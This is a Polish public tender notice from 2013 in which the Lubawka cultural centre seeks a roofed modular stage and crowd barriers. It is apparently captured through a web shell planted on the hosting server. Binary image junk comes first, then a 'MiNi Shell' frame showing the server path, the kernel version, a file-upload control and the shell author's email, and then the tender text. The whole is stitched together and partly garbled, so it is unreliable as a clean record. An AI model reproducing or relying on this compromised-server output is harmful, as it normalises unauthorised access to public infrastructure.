JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130522/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130522/84963-N-2013.html

<p class="kh_header"><b>Lubawka: Zakup sceny z zadaszeniem i wyposażeniem dodatkowym</b><br>
<b>Numer ogłoszenia: 84963 - 2013; data zamieszczenia: 22.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejsko-Gminny Ośrodek Kultury , ul. Przyjaciół Żołnierza 6 A, 58-420 Lubawka, woj. dolnośląskie, tel. 757 411 369.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kultura-lubawka.pl, http://lubawka.nowoczesnagmina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup sceny z zadaszeniem i wyposażeniem dodatkowym.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa: 
a) kompletnej, fabrycznie nowej sceny z zadaszeniem służącej do organizacji imprez w plenerze (koncertów, spektakli, itp.), składającej się z podestu scenicznego o budowie modułowej i wymiarach całkowitych 8,0 x 10,0 metrów oraz z konstrukcji zadaszenia o wymiarach pozwalających należycie osłonić wymieniony podest sceniczny; 
b) ciężkich płotków zaporowych (tzw.: barierek przeciwtłumowych) w ilości 25 sztuk, służących do wygradzania strefy ochronnej w celu ochrony sceny przed bezpośrednim dostępem publiczności. 
Zakres przedmiotowej dostawy obejmuje również dostarczenie przedmiotu zamówienia do siedziby Zamawiającego, oraz pokazowy montaż dostarczonego sprzętu połączony ze szkoleniem czterech osób wyznaczonych przez Zamawiającego, w zakresie jego montażu, demontażu i bieżącej obsługi.
Wymieniony sprzęt powinien posiadać następujące parametry:
1. SCENA (PODEST SCENICZNY):
a) Scena o budowie modułowej z systemem szybkiego montażu i łączenia modułów zapewniającym stabilność całości konstrukcji tzn.: montowana z pojedynczych podestów wykonanych na bazie profili ze stopów aluminium, składających się z blatów o wymiarach 2,0 x 1,0 metr (szerokość, głębokość) i nóg teleskopowych (ze stopów aluminium) mocowanych poprzez zaciśnięcie do specjalnych gniazd w blacie podestu, posiadających możliwość płynnej regulacji wysokości w zakresie od 0,7 do 1,2 metra lub  w zakresie od 0,8 do 1,4 metra; b) Wymiary całkowite sceny po połączeniu podestów: 10,0 x 8,0 metrów (szerokość, głębokość), przy czym konstrukcja podestów scenicznych musi umożliwiać teoretycznie nieograniczoną rozbudowę sceny wzdłuż i wszerz, a także jej podział na mniejsze sceny bez negatywnego wpływu na stabilność konstrukcji i bezpieczeństwo jej użytkowników; c) Konstrukcja podestów scenicznych musi umożliwiać stosowanie sceny niezależnie od rodzaju podłoża, oraz w nierównym terenie gdzie konieczne są różne wysokości każdej z nóg podestu w celu uzyskania poziomej płaszczyzny całości sceny; d) Powierzchnia blatów podestów ze sklejki o grubości co najmniej 15 mm, w kolorze brązowym lub czarnym, trudnopalnej, wodoodpornej i antypoślizgowej; e) Blaty podestów winny posiadać tzw. kanałek na wkładki umożliwiające mocowanie do sceny różnego rodzaju banerów, osłon, kotar, itp.; f) Konstrukcja podestów musi pozwalać na ich składowanie w stosie (minimum po 20 sztuk); g) Nośność pojedynczego podestu: minimum 750 kg / m2, ze współczynnikiem bezpieczeństwa co najmniej 1,5 (bez konieczności montażu dodatkowych stężeń lub wzmocnień); h) Maksymalna waga pojedynczego podestu: 50 kilogramów.

2. SCHODY I PORĘCZE OCHRONNE SCENY (PODESTU SCENICZNEGO):
i) poręcze ochronne o wysokości 1,1 m, spełniające wymogi przepisów budowlanych, przeznaczone do montażu z trzech stron sceny (tj.: bez frontu i szerokości schodów), rama poręczy wykonana z rury aluminiowej o średnicy 30 mm o grubości ścianki 3 mm, posiadająca odpowiednie żebrowanie pionowe wykonane z rury aluminiowej; system montażu za pomocą odpowiednich uchwytów do obrzeży sceny zapewniający stabilność barierek i całości konstrukcji zarówno w pionie i poziomie; j) schody z poręczą (1 szt.) o szerokości 2,0 metrów, o wysokości regulowanej w tym samym zakresie jak scena (podest sceniczny), tj.: umożliwiające dostosowanie wysokości schodów do wysokości podestu scenicznego. Dopuszcza się wykonanie konstrukcji schodów z profili stalowych malowanych proszkowo.

3. KONSTRUKCJA ZADASZENIA SCENY (PODESTU SCENICZNEGO)
a) Konstrukcja zadaszenia montowana z kratownic przestrzennych (belek kratownicowych) typu quadro tj.: o kwadratowym przekroju poprzecznym, zapewniająca prawidłowe osłonięcie podestu scenicznego wraz ze schodami, o którym mowa w punkcie 1 szczegółowego opisu przedmiotu zamówienia, tzn.: słupy nośne konstrukcji zadaszenia winny być usytuowane na zewnątrz podestu scenicznego nie wchodząc w jego światło, natomiast wysokość tzw. prześwitu, winna wynosić nie mniej niż 5 metrów; b) Konstrukcja zadaszenia w postaci ramy nośnej z kratownic przestrzennych typu quadro wykonanych ze stopów aluminium EN AW-6005A wg norm PN-EN 573-3 (gatunek aluminium: 6005A T6 lub twardsze) o minimalnym rozstawie zewnętrznym rur wzdłużnych 290 x 290 mm, i grubości ścianki 3 mm, uzupełnionej dźwigarami i użebrowaniem umożliwiającym równe ułożenie plandeki zadaszenia, swobodny odpływ wody w czasie opadów atmosferycznych, oraz zapobiegające gromadzeniu się wody pochodzącej z tych opadów; c) Słupy nośne konstrukcji zadaszenia z kratownic przestrzennych typu quadro wykonanych ze stopów aluminium EN AW-6005A wg norm PN-EN 573-3 (gatunek aluminium: 6005A T6 lub twardsze), o minimalnym rozstawie zewnętrznym rur wzdłużnych 290 x 290 mm i grubości ścianki 3 mm, wyposażonymi w podstawy stalowe ze stabilizatorami oraz zastrzałami umożliwiającymi stabilne ustawienie oraz bezpieczne użytkowanie konstrukcji; elementy stalowe zabezpieczone przez korozją poprzez ocynkowanie; d) Konstrukcja zadaszenia mocowana do wózków poruszających się wzdłuż słupów nośnych za pomocą wciągarek łańcuchowych (4 szt., nośność 1,0 t każda), celem umożliwienia montażu zadaszenia na poziomie gruntu, oraz opuszczania i podnoszenia dachu na żądaną wysokość; e) Łączenie poszczególnych odcinków konstrukcji zadaszenia winno się odbywać na poziomie gruntu, za pomocą szybkozłączy zapewniających stabilność, sztywność i wytrzymałość całej konstrukcji; f) Dach o konstrukcji dwuspadowej z pokryciem plandeką wodoszczelną wykonaną z PCV / poliestru o minimalnej gramaturze 650 g/m2, posiadającą atest na trudnozapalność (kolor granatowy lub niebieski według palety RAL); g) Plandeka tylna i plandeki boczne z PCV / poliestru, wodoodporne, przepuszczające powietrze, posiadające atest na trudnozapalność, z możliwością swobodnego wejścia na scenę w lewym tylnym narożniku sceny patrząc od frontu (w miejscu zwyczajowego montażu schodów na scenę); h) pasy odciągowe wraz z elementami mocującymi w twardym i miękkim podłożu.

4. DODATKOWE WYMAGANIA UŻYTKOWE:
a) Prace spawalnicze przy elementach konstrukcyjnych przedmiotu zamówienia (kratownice przestrzenne typu quadro, itp.) winny zostać wykonane zgodnie z wymogami jakościowymi w zakresie wykonawstwa i montażu konstrukcji spawanych według normy PN-EN ISO 3834 lub PN-M-69008; b) Sposób wykonania sceny (podestu scenicznego) i konstrukcji zadaszenia winien umożliwiać szybki i łatwy montaż całości konstrukcji tj.: przeprowadzany maksymalnie przez 4 osoby w czasie nie dłuższym niż 4 godz., przy użyciu podstawowych narzędzi tj.: bez użycia rusztowań, dźwigów, i innego sprzętu podobnego rodzaju; c) Maksymalna długość elementów konstrukcyjnych sceny (podestu scenicznego) i zadaszenia nie może przekraczać 4,0 metrów (z uwagi na konieczność łatwego transportu i ograniczenia w zakresie przechowania); d) Oferowany sprzęt powinien posiadać stosowne instrukcje montażu i obsługi, a także dokumenty potwierdzające dopuszczenie techniczne do użytkowania, w tym deklaracje zgodności, certyfikaty lub atesty bezpieczeństwa i trudno zapalności; e) Wymaganym elementem dostawy są nosidła do pokrycia i osłon konstrukcji zadaszenia, oraz skrzynka narzędziowa; f) Skrzynka narzędziowa winna być wyposażona w zapasowe elementy mocujące oraz komplet narzędzi do montażu.

5. CIĘŻKIE PŁOTKI ZAPOROWE (BARIERKI PRZECIWTŁUMOWE)
Fabrycznie nowe płotki zaporowe (barierki ochronne przeciwtłumowe) typu ciężkiego w ilości 25 szt., przeznaczone do wygradzania strefy ochronnej przy scenie i jej zabezpieczenia przed swobodnym dostępem publiczności lub widowni. Wykonane na bazie ramy z profili stalowych, podsiadające z jednej strony podstawę z blachy stalowej ryflowanej, a z drugiej strony dwie podpory z profili stalowych (składane). Wewnątrz ramy z profili użebrowanie z profili pionowych o rozstawie maksymalnym spełniającym wymogi przepisów budowlanych. Wymieniony sprzęt powinien posiadać deklarację zgodności. Całość konstrukcji płotka zabezpieczona antykorozyjnie poprzez ocynkowanie.  Płotki winny posiadać system łączenia ze sobą sąsiadujących płotków ustawianych w formie tymczasowego ogrodzenia, tj. system w formie specjalnych zaczepów mocowań usytuowanych po bokach płotka. Wymagane parametry pojedynczego płotka (barierki): a) minimalna długość: 2,0 metry; b) minimalna wysokość: od 1,1 metra; c) minimalna szerokość podstawy z blachy ryflowanej: 1,2 metra; d) waga: minimalna: 40 kilogramów, maksymalna: 70 kilogramów.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 44.21.00.00-5, 34.92.83.10-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta winna być zabezpieczona wadium w wysokości 3.000,00 zł (słownie: trzy tysiące złotych) najpóźniej do dnia 31 maja 2013 r., do godziny 12.00. Decyduje data i godzina wpływu środków do Zamawiającego.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w zakresie tego warunku żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający oceni spełnianie tego warunku na podstawie oświadczenia Wykonawcy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Wykonawca spełnia warunek, jeżeli w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej dwie dostawy odpowiadające przedmiotowi zamówienia swoim rodzajem i wartością tj.: polegające na dostawie fabrycznie nowej sceny wraz z konstrukcją zadaszenia o wartości minimum 150.000 złotych brutto każda z dostaw. Dostawy takie winny być należycie wykonane. Spełnianie tego warunku Zamawiający oceni na podstawie oświadczenia Wykonawcy i wykazu dostaw wykonanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. 2) Do wykazu wykonanych dostaw Wykonawca musi załączyć dowody dotyczące najważniejszych dostaw, określające czy dostawy te zostały należycie wykonane. 3) Dowodami, o których mowa powyżej są poświadczenia lub oświadczenie Wykonawcy, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia. Dopuszcza się również inne dokumenty potwierdzające należyte wykonanie dostaw. 4) Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. 5) W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców ocena wyżej wymienionego warunku dotyczyć będzie wszystkich Wykonawców łącznie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w zakresie tego warunku żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający oceni spełnianie tego warunku na podstawie oświadczenia Wykonawcy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w zakresie tego warunku żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający oceni spełnianie tego warunku na podstawie oświadczenia Wykonawcy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w zakresie tego warunku żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający oceni spełnianie tego warunku na podstawie oświadczenia Wykonawcy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty należy ponadto dołączyć następujące dokumenty: a) pełnomocnictwo, w przypadku składania oferty wspólnej, b) oświadczenie i stosowne dokumenty w przypadku powoływania się na rozwiązania równoważne, według wytycznych SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://lubawka.nowoczesnagmina.pl, www.kultura-lubawka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ można pobrać ze strony internetowej http://lubawka.nowoczesnagmina.pl lub www.kultura-lubawka.pl, bądź otrzymać w siedzibie Zamawiającego..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.05.2013 godzina 12:00, miejsce: Ofertę w zamkniętej kopercie należy złożyć w siedzibie Zamawiającego tj.: Miejsko-Gminny Ośrodek Kultury , 58-420 Lubawka, ul. Przyjaciół Żołnierza 6a..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> zamówienie jest realizowane w ramach projektu pt.: Uroczystości kulturalne na czesko - polskim pograniczu 2012 - 2014, współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Współpracy Transgranicznej Republika Czeska - Rzeczpospolita Polska 2007 - 2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com